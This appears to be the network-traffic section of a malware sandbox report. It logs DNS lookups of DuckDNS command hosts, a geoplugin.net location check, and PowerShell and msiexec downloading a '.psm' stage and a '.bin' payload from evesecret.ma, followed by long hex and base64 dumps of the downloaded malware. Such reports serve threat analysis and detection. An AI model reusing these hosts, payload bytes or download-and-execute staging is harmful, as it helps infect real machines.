                                                                                                          Oct 28, 2024 09:22:52.858836889 CET1.1.1.1192.168.2.60x4446No error (0)updated212.duckdns.org143.244.46.150A (IP address)IN (0x0001)false
                                                                                                          Oct 28, 2024 09:22:55.523525000 CET1.1.1.1192.168.2.60xe8c1No error (0)odinga.duckdns.org143.244.46.150A (IP address)IN (0x0001)false
                                                                                                          Oct 28, 2024 09:22:57.391422987 CET1.1.1.1192.168.2.60xb9aaNo error (0)geoplugin.net178.237.33.50A (IP address)IN (0x0001)false
                                                                                                          • evesecret.ma
                                                                                                          • plieltd.top
                                                                                                          • geoplugin.net
                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                          0192.168.2.652116178.237.33.50801948C:\Windows\SysWOW64\msiexec.exe
                                                                                                          TimestampBytes transferredDirectionData
                                                                                                          Oct 28, 2024 09:22:57.436872005 CET71OUTGET /json.gp HTTP/1.1
                                                                                                          Host: geoplugin.net
                                                                                                          Cache-Control: no-cache
                                                                                                          Oct 28, 2024 09:22:58.378299952 CET1164INHTTP/1.1 200 OK
                                                                                                          date: Mon, 28 Oct 2024 08:22:58 GMT
                                                                                                          server: Apache
                                                                                                          content-length: 956
                                                                                                          content-type: application/json; charset=utf-8
                                                                                                          cache-control: public, max-age=300
                                                                                                          access-control-allow-origin: *
                                                                                                          Data Raw: 7b 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 72 65 71 75 65 73 74 22 3a 22 31 35 35 2e 39 34 2e 32 34 31 2e 31 38 38 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 73 74 61 74 75 73 22 3a 32 30 30 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 64 65 6c 61 79 22 3a 22 31 6d 73 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 63 72 65 64 69 74 22 3a 22 53 6f 6d 65 20 6f 66 20 74 68 65 20 72 65 74 75 72 6e 65 64 20 64 61 74 61 20 69 6e 63 6c 75 64 65 73 20 47 65 6f 4c 69 74 65 32 20 64 61 74 61 20 63 72 65 61 74 65 64 20 62 79 20 4d 61 78 4d 69 6e 64 2c 20 61 76 61 69 6c 61 62 6c 65 20 66 72 6f 6d 20 3c 61 20 68 72 65 66 3d 27 68 74 74 70 73 3a 5c 2f 5c 2f 77 77 77 2e 6d 61 78 6d 69 6e 64 2e 63 6f 6d 27 3e 68 74 74 70 73 3a 5c 2f 5c 2f 77 77 77 2e 6d 61 78 6d 69 6e 64 2e 63 6f 6d 3c 5c 2f 61 3e 2e 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 63 69 74 79 22 3a 22 44 61 6c 6c 61 73 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 72 65 67 69 6f 6e 22 3a 22 54 65 78 61 73 22 2c 0a 20 20 22 67 65 6f 70 6c [TRUNCATED]
                                                                                                          Data Ascii: { "geoplugin_request":"155.94.241.188", "geoplugin_status":200, "geoplugin_delay":"1ms", "geoplugin_credit":"Some of the returned data includes GeoLite2 data created by MaxMind, available from <a href='https:\/\/www.maxmind.com'>https:\/\/www.maxmind.com<\/a>.", "geoplugin_city":"Dallas", "geoplugin_region":"Texas", "geoplugin_regionCode":"TX", "geoplugin_regionName":"Texas", "geoplugin_areaCode":"", "geoplugin_dmaCode":"623", "geoplugin_countryCode":"US", "geoplugin_countryName":"United States", "geoplugin_inEU":0, "geoplugin_euVATrate":false, "geoplugin_continentCode":"NA", "geoplugin_continentName":"North America", "geoplugin_latitude":"32.8137", "geoplugin_longitude":"-96.8704", "geoplugin_locationAccuracyRadius":"20", "geoplugin_timezone":"America\/Chicago", "geoplugin_currencyCode":"USD", "geoplugin_currencySymbol":"$", "geoplugin_currencySymbol_UTF8":"$", "geoplugin_currencyConverter":0}


                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                          0192.168.2.64971037.230.62.864432448C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                          TimestampBytes transferredDirectionData
                                                                                                          2024-10-28 08:22:05 UTC177OUTGET /Misforstaaelserne.psm HTTP/1.1
                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                                                                          Host: evesecret.ma
                                                                                                          Connection: Keep-Alive
                                                                                                          2024-10-28 08:22:06 UTC210INHTTP/1.1 200 OK
                                                                                                          Server: nginx
                                                                                                          Date: Mon, 28 Oct 2024 08:22:05 GMT
                                                                                                          Content-Length: 455192
                                                                                                          Connection: close
                                                                                                          Last-Modified: Fri, 25 Oct 2024 13:58:17 GMT
                                                                                                          Cache-Control: s-maxage=10
                                                                                                          Accept-Ranges: bytes
                                                                                                          2024-10-28 08:22:06 UTC16174INData Raw: 36 77 4b 6b 77 75 73 43 38 38 6d 37 65 74 49 4e 41 4f 73 43 57 46 4e 78 41 5a 73 44 58 43 51 45 63 51 47 62 63 51 47 62 75 64 76 4a 6d 69 33 72 41 6a 73 75 63 51 47 62 67 66 48 79 41 6d 5a 37 36 77 4b 36 66 4f 73 43 67 37 36 42 36 53 6e 4c 2f 46 62 72 41 69 37 33 36 77 49 71 48 2b 73 43 51 54 44 72 41 71 37 6d 75 68 64 51 75 36 48 72 41 68 65 39 36 77 4c 67 57 58 45 42 6d 2b 73 43 50 2b 41 78 79 6e 45 42 6d 2b 73 43 77 2b 4b 4a 46 41 76 72 41 76 6a 41 63 51 47 62 30 65 4c 72 41 72 4d 49 36 77 49 71 70 6f 50 42 42 48 45 42 6d 33 45 42 6d 34 48 35 52 6c 42 4b 42 48 7a 4c 36 77 4b 4f 78 6e 45 42 6d 34 74 45 4a 41 52 78 41 5a 74 78 41 5a 75 4a 77 2b 73 43 65 69 2f 72 41 6a 65 62 67 63 50 4d 67 49 41 41 63 51 47 62 63 51 47 62 75 72 45 54 5a 30 39 78 41 5a 76
                                                                                                          Data Ascii: 6wKkwusC88m7etINAOsCWFNxAZsDXCQEcQGbcQGbudvJmi3rAjsucQGbgfHyAmZ76wK6fOsCg76B6SnL/FbrAi736wIqH+sCQTDrAq7muhdQu6HrAhe96wLgWXEBm+sCP+AxynEBm+sCw+KJFAvrAvjAcQGb0eLrArMI6wIqpoPBBHEBm3EBm4H5RlBKBHzL6wKOxnEBm4tEJARxAZtxAZuJw+sCei/rAjebgcPMgIAAcQGbcQGburETZ09xAZv
                                                                                                          2024-10-28 08:22:06 UTC16384INData Raw: 46 48 39 38 46 38 54 47 63 50 70 6f 72 6b 2f 73 51 33 2f 71 62 39 73 6f 41 69 43 4c 4d 4c 70 2f 49 2f 67 71 50 39 73 75 4a 6e 2f 62 49 4c 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                          Data Ascii: FH98F8TGcPpork/sQ3/qb9soAiCLMLp/I/gqP9suJn/bILAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                          2024-10-28 08:22:06 UTC16384INData Raw: 55 34 65 44 52 38 7a 33 63 39 49 72 49 4c 71 48 49 76 58 36 66 39 36 49 35 38 6f 6a 6d 57 49 2f 79 79 43 30 38 54 37 41 6d 6e 64 44 2f 30 70 76 32 79 73 6e 35 48 49 35 46 72 72 36 76 4a 2f 72 69 66 36 4e 5a 45 5a 4b 4f 75 58 73 65 59 52 4e 55 65 33 33 34 33 73 4a 67 35 44 75 6d 6d 30 4a 32 79 4b 53 2f 44 56 4e 76 4a 64 48 6f 59 32 73 6d 49 59 61 4d 47 43 72 57 71 6a 54 50 36 34 56 31 4d 30 69 59 38 74 73 55 7a 4d 7a 50 69 42 42 57 78 47 66 5a 32 50 2f 53 6d 2f 62 4c 6a 6d 39 75 32 43 79 68 34 4c 67 75 6e 2f 65 53 31 37 74 35 66 45 53 59 54 45 6a 64 6e 4a 6a 50 39 55 68 6a 6e 4d 53 59 37 45 30 63 4e 79 6a 50 39 46 64 32 52 4e 69 37 44 39 77 73 67 4c 33 4d 6e 75 46 77 76 6d 71 31 39 37 68 64 4d 6a 77 50 36 77 4a 75 4d 56 57 76 69 37 74 6e 50 70 4e 74 37 59
                                                                                                          Data Ascii: U4eDR8z3c9IrILqHIvX6f96I58ojmWI/yyC08T7AmndD/0pv2ysn5HI5Frr6vJ/rif6NZEZKOuXseYRNUe3343sJg5Dumm0J2yKS/DVNvJdHoY2smIYaMGCrWqjTP64V1M0iY8tsUzMzPiBBWxGfZ2P/Sm/bLjm9u2Cyh4Lgun/eS17t5fESYTEjdnJjP9UhjnMSY7E0cNyjP9Fd2RNi7D9wsgL3MnuFwvmq197hdMjwP6wJuMVWvi7tnPpNt7Y
                                                                                                          2024-10-28 08:22:06 UTC16384INData Raw: 78 42 67 42 4a 45 73 77 75 6e 4d 5a 43 55 6a 76 35 58 58 59 6c 75 30 51 4b 63 47 35 74 55 79 6b 2f 4e 58 6d 4d 34 69 52 5a 37 64 70 32 47 31 69 56 6c 4e 32 65 36 61 77 53 6d 35 4c 38 4c 70 2f 32 79 43 36 66 39 73 67 75 6e 2f 62 49 4c 70 2f 31 68 77 57 2b 46 44 7a 36 4f 30 71 4f 51 72 71 6f 36 79 37 2b 6d 5a 47 55 46 6b 78 69 42 7a 6b 61 55 76 73 4c 58 67 43 2b 67 68 66 6f 6f 38 55 4e 70 76 72 35 75 4d 2f 30 45 4a 77 65 72 4a 68 4f 55 6c 78 77 46 4d 2b 57 44 4d 6c 70 63 4a 68 4f 63 43 4b 38 65 34 35 63 75 48 4c 4d 36 4f 73 56 36 63 4b 77 55 6f 30 35 65 54 51 55 78 43 6f 46 66 35 35 6e 48 46 56 49 38 36 6b 69 54 36 67 72 6b 43 30 52 71 51 57 32 61 33 30 4a 53 4a 6f 44 47 71 57 6a 39 73 67 51 6a 4a 6f 6f 4c 70 36 50 69 73 77 6e 4d 6e 6c 47 53 30 67 51 50 49
                                                                                                          Data Ascii: xBgBJEswunMZCUjv5XXYlu0QKcG5tUyk/NXmM4iRZ7dp2G1iVlN2e6awSm5L8Lp/2yC6f9sgun/bILp/1hwW+FDz6O0qOQrqo6y7+mZGUFkxiBzkaUvsLXgC+ghfoo8UNpvr5uM/0EJwerJhOUlxwFM+WDMlpcJhOcCK8e45cuHLM6OsV6cKwUo05eTQUxCoFf55nHFVI86kiT6grkC0RqQW2a30JSJoDGqWj9sgQjJooLp6PiswnMnlGS0gQPI
                                                                                                          2024-10-28 08:22:06 UTC16384INData Raw: 39 76 70 73 41 6b 35 42 43 55 66 4f 50 45 69 30 6b 67 78 2b 6e 79 30 76 73 47 78 4b 44 66 73 4f 76 4f 52 51 37 62 35 30 45 79 65 51 79 55 37 76 4f 4b 79 50 31 38 53 65 71 77 55 39 31 54 4a 76 6d 57 51 4d 6d 37 54 46 30 5a 51 31 71 42 61 48 78 45 55 7a 56 54 6d 59 70 4a 36 52 44 51 6a 58 78 45 75 6d 55 31 6e 6f 70 52 6e 71 6d 4c 4d 71 38 75 67 6b 58 30 67 4a 62 42 65 48 74 36 6f 4b 35 4f 6b 50 45 52 49 30 4d 30 7a 45 50 57 52 4e 6d 78 71 4d 39 56 53 4a 62 47 64 44 7a 6e 6b 53 62 6b 69 6c 6c 55 44 67 75 30 70 7a 62 42 2b 54 46 57 73 4c 79 72 31 6d 42 4f 47 6e 74 65 2f 61 63 78 48 42 65 48 6c 79 78 70 66 44 30 72 5a 6b 47 6f 47 44 36 33 2f 65 6d 75 4e 76 72 4d 43 50 63 51 36 34 55 56 74 4d 32 6b 2f 65 72 30 45 67 57 79 43 36 64 30 4a 78 36 6c 2f 62 4b 43 5a
                                                                                                          Data Ascii: 9vpsAk5BCUfOPEi0kgx+ny0vsGxKDfsOvORQ7b50EyeQyU7vOKyP18SeqwU91TJvmWQMm7TF0ZQ1qBaHxEUzVTmYpJ6RDQjXxEumU1nopRnqmLMq8ugkX0gJbBeHt6oK5OkPERI0M0zEPWRNmxqM9VSJbGdDznkSbkillUDgu0pzbB+TFWsLyr1mBOGnte/acxHBeHlyxpfD0rZkGoGD63/emuNvrMCPcQ64UVtM2k/er0EgWyC6d0Jx6l/bKCZ
                                                                                                          2024-10-28 08:22:06 UTC16384INData Raw: 55 57 6f 31 6d 67 47 72 2f 68 4e 6e 65 46 30 78 59 42 36 51 76 6a 42 4e 72 44 6f 71 66 36 56 59 65 76 50 67 4f 36 4f 32 75 7a 54 6e 4c 30 77 37 65 71 78 46 2b 31 69 4e 53 4f 4a 52 61 6a 57 61 41 61 76 2b 45 32 64 34 58 54 46 67 48 70 43 2b 4d 45 32 73 4f 69 70 2f 70 56 65 58 43 4b 5a 42 43 6e 4f 36 56 38 57 65 4b 79 7a 62 44 4d 70 41 66 54 52 61 5a 38 67 55 4c 57 67 79 36 4f 5a 33 79 42 66 56 62 71 36 34 35 76 66 4a 6b 38 68 39 70 32 62 53 59 44 31 4e 73 6d 50 6d 7a 77 43 66 73 7a 34 48 30 47 48 41 30 6d 42 2f 56 62 67 76 56 78 6a 6e 56 32 2f 69 2b 6a 6d 7a 66 62 59 50 77 56 6b 77 4c 58 4e 39 4d 6d 31 4e 75 6b 55 2f 73 32 2f 43 62 4d 55 35 78 6b 32 59 72 52 4a 73 79 50 64 64 54 36 64 59 36 4b 2f 37 49 4c 4a 70 52 2f 41 53 5a 51 6e 77 6d 6e 2f 57 79 76 4b
                                                                                                          Data Ascii: UWo1mgGr/hNneF0xYB6QvjBNrDoqf6VYevPgO6O2uzTnL0w7eqxF+1iNSOJRajWaAav+E2d4XTFgHpC+ME2sOip/pVeXCKZBCnO6V8WeKyzbDMpAfTRaZ8gULWgy6OZ3yBfVbq645vfJk8h9p2bSYD1NsmPmzwCfsz4H0GHA0mB/VbgvVxjnV2/i+jmzfbYPwVkwLXN9Mm1NukU/s2/CbMU5xk2YrRJsyPddT6dY6K/7ILJpR/ASZQnwmn/WyvK
                                                                                                          2024-10-28 08:22:06 UTC16384INData Raw: 79 44 55 38 76 4e 54 54 4a 74 66 48 50 41 42 32 6d 37 69 6b 34 36 45 70 2b 75 4f 72 4f 42 5a 6b 72 62 69 70 5a 4f 4c 6c 71 56 46 71 7a 2f 67 4d 61 67 58 34 55 46 4c 53 70 5a 6f 63 4d 43 58 43 64 47 4c 4a 7a 76 35 69 6c 66 59 70 50 31 2b 34 79 37 38 48 31 35 56 6f 71 57 30 72 46 67 48 6e 6c 4e 69 70 61 32 63 73 46 6b 65 55 51 7a 53 7a 6f 33 75 71 62 39 73 6f 56 53 32 63 4b 4b 32 6f 45 55 41 4b 66 39 76 59 62 6b 61 55 33 30 4a 6b 67 44 43 71 66 39 55 6a 56 74 33 44 66 53 4a 6b 67 44 43 71 66 39 58 57 74 47 66 6a 4f 2b 46 76 79 79 43 79 56 57 76 64 6c 52 4f 30 5a 4b 57 48 41 44 43 71 66 39 78 2f 79 65 50 50 4f 4f 66 54 34 35 54 34 50 35 4e 75 78 67 2f 63 30 4f 71 67 54 6c 74 50 39 6c 73 55 34 6b 41 71 6b 45 4b 79 49 69 43 4b 65 69 4e 39 49 6d 7a 66 76 33 6c
                                                                                                          Data Ascii: yDU8vNTTJtfHPAB2m7ik46Ep+uOrOBZkrbipZOLlqVFqz/gMagX4UFLSpZocMCXCdGLJzv5ilfYpP1+4y78H15VoqW0rFgHnlNipa2csFkeUQzSzo3uqb9soVS2cKK2oEUAKf9vYbkaU30JkgDCqf9UjVt3DfSJkgDCqf9XWtGfjO+FvyyCyVWvdlRO0ZKWHADCqf9x/yePPOOfT45T4P5Nuxg/c0OqgTltP9lsU4kAqkEKyIiCKeiN9Imzfv3l
                                                                                                          2024-10-28 08:22:06 UTC16384INData Raw: 62 6e 4b 36 53 72 70 6f 49 53 47 62 4d 4c 70 33 52 6b 58 63 48 79 64 54 69 6e 2f 62 49 4c 70 2f 32 79 43 36 66 39 73 67 75 6e 2f 62 4c 4a 71 44 58 61 58 6f 78 63 4f 68 45 6d 48 2b 50 30 46 59 44 4b 38 53 78 49 56 67 71 6e 2f 54 6d 4d 70 2f 57 79 43 36 53 37 76 6f 49 79 6d 4c 41 4c 70 7a 48 2f 51 52 52 67 79 55 7a 75 47 75 67 34 36 38 38 5a 43 62 6f 67 33 5a 31 6f 6b 79 49 6e 4f 6b 33 64 33 36 65 49 57 55 59 31 43 52 32 74 36 4d 4f 6e 2f 36 67 59 4f 38 6e 31 64 69 64 75 70 66 32 79 34 32 7a 5a 73 51 76 2b 66 6e 51 6a 35 6e 51 2f 75 71 62 39 73 6c 30 5a 6e 63 2f 41 42 33 78 45 79 36 47 79 74 49 70 52 58 63 69 50 41 61 30 75 67 6b 66 30 67 70 62 42 65 45 78 38 70 44 6b 43 70 72 78 52 50 6e 73 59 79 72 79 6f 31 49 4c 66 71 71 75 6d 64 4b 4f 48 59 46 75 55 65
                                                                                                          Data Ascii: bnK6SrpoISGbMLp3RkXcHydTin/bILp/2yC6f9sgun/bLJqDXaXoxcOhEmH+P0FYDK8SxIVgqn/TmMp/WyC6S7voIymLALpzH/QRRgyUzuGug4688ZCbog3Z1okyInOk3d36eIWUY1CR2t6MOn/6gYO8n1didupf2y42zZsQv+fnQj5nQ/uqb9sl0Znc/AB3xEy6GytIpRXciPAa0ugkf0gpbBeEx8pDkCprxRPnsYyryo1ILfqqumdKOHYFuUe
                                                                                                          2024-10-28 08:22:06 UTC16384INData Raw: 69 2f 67 6a 2f 2b 6e 77 49 75 5a 62 45 7a 62 54 71 79 79 53 33 33 62 6f 71 58 35 4c 31 44 69 58 6c 65 69 70 64 39 67 52 30 4e 6d 7a 66 54 4a 73 31 44 4e 43 47 54 64 59 36 6c 2f 37 49 4c 6d 6c 36 38 69 79 61 41 77 6d 32 4a 2f 62 49 45 49 33 47 42 43 4b 65 62 4e 39 6f 6d 65 4c 41 4a 70 2f 33 50 4b 4c 47 75 4e 75 51 6d 65 4c 41 4a 70 2f 32 43 2f 32 67 71 4d 37 36 6c 2f 37 49 4c 54 6b 64 47 6f 5a 76 7a 4e 75 63 69 50 66 4c 30 4b 76 2b 77 43 36 65 49 52 30 74 67 2f 57 33 4e 6a 68 49 7a 39 58 67 31 64 42 45 6d 2f 64 63 6b 2f 52 49 7a 43 36 68 7a 30 67 74 4f 4e 62 49 4c 70 77 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                          Data Ascii: i/gj/+nwIuZbEzbTqyyS33boqX5L1DiXleipd9gR0NmzfTJs1DNCGTdY6l/7ILml68iyaAwm2J/bIEI3GBCKebN9omeLAJp/3PKLGuNuQmeLAJp/2C/2gqM76l/7ILTkdGoZvzNuciPfL0Kv+wC6eIR0tg/W3NjhIz9Xg1dBEm/dck/RIzC6hz0gtONbILpwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                          2024-10-28 08:22:06 UTC16384INData Raw: 2f 53 65 79 70 4a 48 4d 78 38 61 6e 32 70 2f 76 6a 67 4d 6f 49 58 2b 54 4d 4c 66 49 57 30 6c 44 72 47 69 71 44 2b 49 2f 67 4e 4f 76 55 50 74 75 47 66 46 57 75 4a 76 7a 75 32 33 30 56 70 33 6b 67 61 5a 4a 76 6e 68 66 79 6f 5a 31 6e 4d 58 6e 4a 72 36 69 74 66 69 6b 55 56 78 55 4e 57 57 4b 77 4c 62 45 4c 62 54 59 70 57 42 49 54 45 39 33 78 62 4a 42 6f 6f 64 59 70 57 6b 71 55 66 54 36 38 75 67 6b 58 30 75 4a 62 42 65 48 78 79 74 32 4c 33 61 62 56 43 50 6f 79 53 74 31 6a 70 4f 49 43 63 47 32 4e 70 54 79 6e 6e 67 70 68 76 38 32 73 33 79 66 31 39 53 63 58 2b 66 4d 55 50 30 50 67 44 53 47 75 43 4a 72 72 45 75 64 79 43 64 49 34 2f 47 5a 6a 4d 70 45 58 64 50 2f 66 47 34 41 79 70 2f 50 73 76 7a 64 56 5a 58 41 4c 45 4c 55 30 6a 38 6e 73 65 7a 57 55 68 4b 78 4f 4b 30
                                                                                                          Data Ascii: /SeypJHMx8an2p/vjgMoIX+TMLfIW0lDrGiqD+I/gNOvUPtuGfFWuJvzu230Vp3kgaZJvnhfyoZ1nMXnJr6itfikUVxUNWWKwLbELbTYpWBITE93xbJBoodYpWkqUfT68ugkX0uJbBeHxyt2L3abVCPoySt1jpOICcG2NpTynngphv82s3yf19ScX+fMUP0PgDSGuCJrrEudyCdI4/GZjMpEXdP/fG4Ayp/PsvzdVZXALELU0j8nsezWUhKxOK0


                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                          1192.168.2.65200237.230.62.864431948C:\Windows\SysWOW64\msiexec.exe
                                                                                                          TimestampBytes transferredDirectionData
                                                                                                          2024-10-28 08:22:35 UTC170OUTGET /eYyaWC130.bin HTTP/1.1
                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                                                                          Host: evesecret.ma
                                                                                                          Cache-Control: no-cache
                                                                                                          2024-10-28 08:22:36 UTC250INHTTP/1.1 200 OK
                                                                                                          Server: nginx
                                                                                                          Date: Mon, 28 Oct 2024 08:22:36 GMT
                                                                                                          Content-Type: application/octet-stream
                                                                                                          Content-Length: 494656
                                                                                                          Connection: close
                                                                                                          Last-Modified: Fri, 25 Oct 2024 13:45:19 GMT
                                                                                                          Cache-Control: s-maxage=10
                                                                                                          Accept-Ranges: bytes
                                                                                                          2024-10-28 08:22:36 UTC16134INData Raw: 0d 75 ff 56 1f e2 14 4e 95 81 14 ee 58 b4 05 39 66 c5 81 db 2d e4 d5 58 38 7e 73 7e 82 6e a6 2c 04 15 ba 50 82 b7 c9 35 4f df 08 07 cd f9 f1 3e ef bb c5 38 ab 7c 04 1d 77 be 68 ac 40 8c d5 30 aa cb ec bf 30 37 ce b4 44 51 e0 59 04 cc 3d 4b e7 7a e5 8f 28 a2 e3 c8 ef 12 d8 e4 ca 6b 15 96 a7 9b d6 22 67 9d f2 0a 97 a2 46 38 8e 3d bd f2 a6 3e 16 b7 83 9e 28 62 82 df 45 da 2a a9 b3 c7 1f 60 00 51 e2 c9 b7 2b 48 67 8a 7e 96 dd 5d 47 be 83 9e 0b fb c6 0e 14 9a 9e 44 43 af 4c c3 ea 16 90 21 5e db 09 c5 56 4a d0 47 ed fd c5 03 65 3c 33 9c d7 e2 76 b9 0b 07 a1 9d b7 5f 0c 33 a3 ed e1 94 d0 c7 35 fa 2b 36 77 ca 80 b4 18 63 7c 7c d9 56 e0 b5 4f f9 1f 08 87 81 b5 b8 40 6d ca 29 81 65 c6 0a 9b ec 1a 4a e5 40 cf 1b 05 3e bc b6 68 8a e9 1d 3a 31 64 3b 61 d5 c1 c2 8c 04
                                                                                                          Data Ascii: uVNX9f-X8~s~n,P5O>8|wh@007DQY=Kz(k"gF8=>(bE*`Q+Hg~]GDCL!^VJGe<3v_35+6wc||VO@m)eJ@>h:1d;a
                                                                                                          2024-10-28 08:22:36 UTC16384INData Raw: 7b 18 80 bd 41 36 7f bc 70 2d 86 a5 a8 a4 f3 18 00 c2 55 bd 58 aa ce 1c 42 ac 41 83 a3 01 3c d5 cc 1d 7b 3d 33 10 07 d0 91 88 23 57 82 95 b9 06 da 9e 32 f6 5f 85 e3 4b 8e 0c b7 36 52 46 6e 2a be 20 08 27 6e 72 07 d8 bc fb f1 0f 7f 72 b1 65 18 de 3d 73 09 44 ba cc 53 e1 e9 e9 6d c6 92 09 29 59 c7 b3 30 c9 d2 d8 64 3d dc a6 09 61 15 91 f0 cc e9 22 73 67 d9 d5 9b eb 3a 0a 09 4e 39 45 c8 3b 80 64 c1 c9 40 6d c8 0a d7 8c 8f bd 05 18 d5 15 52 f0 92 b6 e6 77 8a 02 ee c1 3d 91 6a 97 de f7 2f 9f 5d 4a 45 fb ee 10 94 2e 11 14 37 fe 1b f9 81 90 38 9b f9 75 ac cf 8d 39 d8 49 d4 9e 3a 33 d1 d1 b2 13 62 c9 ce de 59 92 4d c6 81 7c bf 17 43 9d ef d2 f3 05 48 ae 53 b7 90 26 55 bf db e5 7d b2 60 43 11 84 ef 05 8e d6 98 94 49 5d a1 82 47 24 36 64 b5 70 3c 45 a4 2f 8a c1 f0
                                                                                                          Data Ascii: {A6p-UXBA<{=3#W2_K6RFn* 'nrre=sDSm)Y0d=a"sg:N9E;d@mRw=j/]JE.78u9I:3bYM|CHS&U}`CI]G$6dp<E/
                                                                                                          2024-10-28 08:22:36 UTC16384INData Raw: 91 7c bf b3 0a c8 9f 07 51 e0 0a ad b8 cc 3f 58 48 3e 66 8a a2 e3 c8 22 9f b0 1b 35 94 fd 21 a7 9b d6 a1 8b 85 7f 4f af 29 8a 68 66 3d 2b 0d 59 bd fa af 0e db 08 e9 4e 8f ad 49 37 a8 b3 44 fd 67 37 1a ea f6 72 b6 81 5a 8e 32 5b aa 84 a2 bf 0f 41 84 61 3e 69 66 fb 7e 31 28 44 fa 20 c8 8a 58 67 09 fa 7b 33 d4 72 32 e5 9d 3d 51 24 53 eb 78 9e f4 cc 93 0a c6 dc 5e 1e 5b 4b 87 ff cb 55 c5 6a fd 64 3b 96 61 18 2b 1c 16 54 c5 4a fd 03 b3 65 15 22 3d 37 3e b2 01 4c e4 c2 a5 44 5c c2 2d 40 b8 df 45 0a e9 46 6f fa d5 c6 e0 17 4f ed ba 64 68 a8 c8 c9 1a de 25 8d f3 98 7e 50 e6 c0 34 32 5f 17 e7 76 75 96 f0 f2 8d d3 59 8c b8 8b 37 3b 3b d6 b6 27 12 fd c2 98 82 3b 23 01 7f 0d 60 e1 6f ed be bf cf ab 64 07 44 c9 0b 4b 7c dc f4 90 ba 62 45 5f 51 ac 2e 0c e8 c9 1c c4 07
                                                                                                          Data Ascii: |Q?XH>f"5!O)hf=+YNI7Dg7rZ2[Aa>if~1(D Xg{3r2=Q$Sx^[KUjd;a+TJe"=7>LD\-@EFoOdh%~P42_vuY7;;';#`odDK|bE_Q.
                                                                                                          2024-10-28 08:22:36 UTC16384INData Raw: f4 66 7c 26 68 e2 fc ed e0 47 9d 89 e4 0c 2e ce b3 f7 c6 15 39 55 b4 82 cd 39 52 25 92 ed 56 bf f0 90 73 2a 93 da dc 86 9a cb 09 d6 91 8a e5 ff 3d ac 80 fe e6 36 54 da 0c db 55 1d aa e1 35 f1 e5 7c 27 4a 5e 4a bb 01 49 cc 88 67 d7 f7 f5 9c 0d 25 e6 8f 2e ad d1 b4 4e b2 fb f7 9d 94 18 98 e3 94 e0 f5 86 d6 fc ad e5 b4 13 0d 2d bf 11 28 1b 6d f1 9e 2c f2 41 77 bd 1a 14 19 75 5d bc ca b8 65 2c 89 15 48 27 94 2a 67 44 49 a9 7a 8f b4 49 23 ce d9 78 59 b5 87 dc 59 8d e6 a3 1c 47 fa 12 00 2d df ef 3e 86 19 10 34 c3 5d d8 33 0c 5a be cf 6c 5b c2 2d 48 2e 3a 0b 0b 1f fe 16 2b ee af 8d 5c a1 2d 0d bc da 03 8d 06 30 b2 e5 80 01 65 cc e2 fc 9a 64 b6 e3 89 04 cd 5e dd 3a 82 f4 53 89 0c a8 ba 7b 04 7b 3d c5 64 73 a5 bb 0d 88 d6 ed 64 7e d5 15 5c 9e b5 98 84 8c 05 19 c8
                                                                                                          Data Ascii: f|&hG.9U9R%Vs*=6TU5|'J^JIg%.N-(m,Awu]e,H'*gDIzI#xYYG->4]3Zl[-H.:+\-0ed^:S{{=dsd~\
